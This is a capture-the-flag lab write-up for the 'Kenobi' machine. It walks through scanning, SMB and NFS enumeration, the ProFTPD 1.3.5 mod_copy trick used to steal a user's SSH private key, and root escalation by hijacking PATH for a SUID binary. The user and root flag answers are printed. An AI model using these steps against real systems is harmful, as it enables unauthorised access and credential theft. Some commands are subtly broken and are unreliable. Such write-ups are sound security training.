# Kenobi

## Scanning

```
sudo nmap -sS -A -T4 10.10.184.162 -oN initialscan.nmap

Starting Nmap 7.60 ( https://nmap.org ) at 2023-03-26 05:54 BST
Nmap scan report for ip-10-10-184-162.eu-west-1.compute.internal (10.10.184.162)
Host is up (0.00064s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         ProFTPD 1.3.5
22/tcp   open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 b3:ad:83:41:49:e9:5d:16:8d:3b:0f:05:7b:e2:c0:ae (RSA)
|   256 f8:27:7d:64:29:97:e6:f8:65:54:65:22:f7:c8:1d:8a (ECDSA)
|_  256 5a:06:ed:eb:b6:56:7e:4c:01:dd:ea:bc:ba:fa:33:79 (EdDSA)
80/tcp   open  http        Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 1 disallowed entry 
|_/admin.html
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
111/tcp  open  rpcbind     2-4 (RPC #100000)
| rpcinfo: 
|   program version   port/proto  service
|   100000  2,3,4        111/tcp  rpcbind
|   100000  2,3,4        111/udp  rpcbind
|   100003  2,3,4       2049/tcp  nfs
|   100003  2,3,4       2049/udp  nfs
|   100005  1,2,3      47705/tcp  mountd
|   100005  1,2,3      48332/udp  mountd
|   100021  1,3,4      39455/tcp  nlockmgr
|   100021  1,3,4      54592/udp  nlockmgr
|   100227  2,3         2049/tcp  nfs_acl
|_  100227  2,3         2049/udp  nfs_acl
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
2049/tcp open  nfs_acl     2-3 (RPC #100227)
MAC Address: 02:EE:F3:F5:03:59 (Unknown)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.60%E=4%D=3/26%OT=21%CT=1%CU=33751%PV=Y%DS=1%DC=D%G=Y%M=02EEF3%T
OS:M=641FD021%P=x86_64-pc-linux-gnu)SEQ(SP=FB%GCD=1%ISR=FB%TI=Z%CI=I%TS=8)S
OS:EQ(SP=FB%GCD=1%ISR=FB%TI=Z%CI=I%II=I%TS=8)SEQ(SP=FB%GCD=1%ISR=FB%TI=Z%TS
OS:=8)OPS(O1=M2301ST11NW7%O2=M2301ST11NW7%O3=M2301NNT11NW7%O4=M2301ST11NW7%
OS:O5=M2301ST11NW7%O6=M2301ST11)WIN(W1=68DF%W2=68DF%W3=68DF%W4=68DF%W5=68DF
OS:%W6=68DF)ECN(R=Y%DF=Y%T=40%W=6903%O=M2301NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40
OS:%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=
OS:%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%
OS:W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=
OS:)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%
OS:DFI=N%T=40%CD=S)

Network Distance: 1 hop
Service Info: Host: KENOBI; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_nbstat: NetBIOS name: KENOBI, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
|   Computer name: kenobi
|   NetBIOS computer name: KENOBI\x00
|   Domain name: \x00
|   FQDN: kenobi
|_  System time: 2023-03-25T23:54:52-05:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2023-03-26 05:54:52
|_  start_date: 1600-12-31 23:58:45

TRACEROUTE
HOP RTT     ADDRESS
1   0.64 ms ip-10-10-184-162.eu-west-1.compute.internal (10.10.184.162)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 32.85 seconds

```

{% hint style="info" %}
**Ports open**

7
{% endhint %}

## Enmerate SMB Shares

### Nmap smb enumeration scripts

```
nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse 10.10.184.162
```

<figure><img src="https://755681241-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fa5rXMZ1JAQhUeS7TtZkM%2Fuploads%2FrbYiJ0V7TCXoikcfYTJT%2Fimage.png?alt=media&#x26;token=b21f5092-06ad-4231-a74b-cceec59c4f9c" alt=""><figcaption></figcaption></figure>

### Connect with smbclient to the share

```
smbclient //10.10.184.162/anonymous
```

A file is present log.txt. Used the get command to download it.

```
get
\\recursively download files
smbget -R smb://10.10.184.162/anonymous
```

log.txt contain important information about ftp and NFS

#### ssh key location

<figure><img src="https://755681241-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fa5rXMZ1JAQhUeS7TtZkM%2Fuploads%2FDBHrTxDEOQ5bnaHRq3Su%2Fimage.png?alt=media&#x26;token=36e9497d-04bd-4256-8d05-632a19ee970b" alt=""><figcaption></figcaption></figure>

#### Anonymous ftp login allowed

#### &#x20;

<figure><img src="https://755681241-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fa5rXMZ1JAQhUeS7TtZkM%2Fuploads%2Fby1FXpUVK4QgAIoKuhwq%2Fimage.png?alt=media&#x26;token=008cd27e-8661-4247-9731-4fe20806503a" alt=""><figcaption></figcaption></figure>

{% hint style="info" %}
**Using the nmap command above, how many shares have been found?**

3

**Once you're connected, list the files on the share. What is the file can you see?**

log.txt

**What port is FTP running on?**

21

**What mount can we see?**

/var
{% endhint %}

Enumerate RPC Bind

```
nmap -p 111 --script=nfs-ls,nfs-statfs,nfs-showmount 10.10.184.162
```

<mark style="color:blue;">**We have /var directory as mount**</mark>

```
Nmap scan report for ip-10-10-184-162.eu-west-1.compute.internal (10.10.184.162)
Host is up (0.00017s latency).

PORT    STATE SERVICE
111/tcp open  rpcbind
| nfs-ls: Volume /var
|   access: Read Lookup NoModify NoExtend NoDelete NoExecute
| PERMISSION  UID  GID  SIZE  TIME                 FILENAME
| rwxr-xr-x   0    0    4096  2019-09-04T08:53:24  .
| rwxr-xr-x   0    0    4096  2019-09-04T12:27:33  ..
| rwxr-xr-x   0    0    4096  2019-09-04T12:09:49  backups
| rwxr-xr-x   0    0    4096  2019-09-04T10:37:44  cache
| rwxrwxrwt   0    0    4096  2019-09-04T08:43:56  crash
| rwxrwsr-x   0    50   4096  2016-04-12T20:14:23  local
| rwxrwxrwx   0    0    9     2019-09-04T08:41:33  lock
| rwxrwxr-x   0    108  4096  2019-09-04T10:37:44  log
| rwxr-xr-x   0    0    4096  2019-01-29T23:27:41  snap
| rwxr-xr-x   0    0    4096  2019-09-04T08:53:24  www
|_
| nfs-showmount: 
|_  /var *
| nfs-statfs: 
|   Filesystem  1K-blocks  Used       Available  Use%  Maxfilesize  Maxlink
|_  /var        9204224.0  1836524.0  6877104.0  22%   16.0T        32000
MAC Address: 02:EE:F3:F5:03:59 (Unknown)

```

## Gain initial access with ProFtpd

search for exploits for proFtpd 1.3.5

```
searchsploit proftpd 1.3.5
```

<figure><img src="https://755681241-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fa5rXMZ1JAQhUeS7TtZkM%2Fuploads%2FwanFiix0GSpP2YlD68PT%2Fimage.png?alt=media&#x26;token=6192d85c-dacf-4736-a8e2-bed87349fdaf" alt=""><figcaption></figcaption></figure>

The vulnerable Proftpd 1.3.5 version allows copying of files unauthenticated. copy the ssh key we found earlier to var folder.

The mod\_copy module implements SITE CPFR and SITE CPTO commands, which can be used to copy files/directories from one place to another on the server. Any unauthenticated client can leverage these commands to copy files from any part of the filesystem to a chosen destination.

```
SITE CPFR /home/kenobi/.ssh/id_rsa
SITE CPTO /var/tmp/id_rsa
```

<figure><img src="https://755681241-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fa5rXMZ1JAQhUeS7TtZkM%2Fuploads%2FJxYDVvfXmzjveJCtgOra%2Fimage.png?alt=media&#x26;token=00aca93f-3839-4df1-9352-5de105eca49d" alt=""><figcaption></figcaption></figure>

Now we can mount the /var folder on our machine and get the private key

```
mkdir /mnt/kenobiNFS
mount 10.10.184.162:/var /mnt/kenobiNFS
ls -la /mnt/kenobiNFS
```

copy the key to current folder and use that to access the machine

```
cp /mnt/kenobiNFS/tmp/id_rsa .
chmod 600 id_rsa
ssh -i id_rsa kenobi@10.10.184.162
```

{% hint style="info" %}
\
**Lets get the version of ProFtpd. Use netcat to connect to the machine on the FTP port.**

**What is the version?**

1.3.5

**How many exploits are there for the ProFTPd running?**

4

**What is Kenobi's user flag (/home/kenobi/user.txt)?**

d0b0f3f53b6caa532a83915e19224899
{% endhint %}

## Priv Escalation

check for SUID binaries

```
find / -perm -u=s -type f 2>/dev/null
```

we found a suspicious binary

<figure><img src="https://755681241-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fa5rXMZ1JAQhUeS7TtZkM%2Fuploads%2F8vBsuNwvL6h95Flz5tBS%2Fimage.png?alt=media&#x26;token=1eb5ff57-afc8-42d7-b8a5-038bb56e2c21" alt=""><figcaption></figcaption></figure>

checking the strings, we get to know that the binaries are being called without full path

<figure><img src="https://755681241-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fa5rXMZ1JAQhUeS7TtZkM%2Fuploads%2FbBgkyDJEUOSdKHpfpEmM%2Fimage.png?alt=media&#x26;token=26d6c944-1656-484e-849f-e66ee74127bc" alt=""><figcaption></figcaption></figure>

copy the shell to the current directory and rename it to curl, add permissions to it and add it to PATH

```
which sh
cp /bin/sh .   \\or echo /bin/sh > ifconfig
cp sh ifconfig
chmod +xs ifconfig
export path = /home/kenobi:$PATH
```

Now run menu and select the option and we will get the root shell. <mark style="color:red;">using curl did not work for me</mark>

{% hint style="info" %}
**What file looks particularly out of the ordinary?**&#x20;

/usr/bin/menu

**Run the binary, how many options appear?**

3

**What is the root flag (/root/root.txt)?**

177b3cd8562289f37382721c28381f02
{% endhint %}

\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_

### Gaining direct shell

```
searchsploit -m 36803.py
python2 -m pip install requests
\\did not work for me, we may need write permissions for it to work. It also has metasploit version which will not work as well
```